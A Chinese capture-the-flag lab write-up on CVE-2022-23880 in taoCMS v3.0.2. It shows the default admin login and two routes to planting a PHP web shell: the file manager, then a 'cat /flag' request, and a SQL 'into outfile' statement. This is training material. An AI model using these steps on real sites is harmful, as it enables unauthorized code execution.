春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)

目录

一、题目

二、进入题目:

 2.1 文件写入一句话木马:

2.2 用SQL语句写入木马:


一、题目

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第1张图片

靶标介绍:

taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码

二、进入题目:

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第2张图片

访问/admin 

admin:tao

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第3张图片

 后台管理页面:

新建文件

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第4张图片

 2.1 文件写入一句话木马:

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第5张图片

 访问 /shell.php?1=cat /flag

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第6张图片

flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0} 

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第7张图片

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第8张图片

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

2.2 用SQL语句写入木马:

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第9张图片

 可以访问:

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第10张图片

 写入文件一句话木马:

select "" into outfile '/var/www/html/cat.php'

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第11张图片

 访问/cat.php

春秋云境:CVE-2022-23880(taoCMS v3.0.2 任意文件上传漏洞)_第12张图片

 flag{567b48ba-ed69-4f38-a75f-1102ecd2c8e0}

你可能感兴趣的:(i春秋,安全,web安全,网络安全,sql)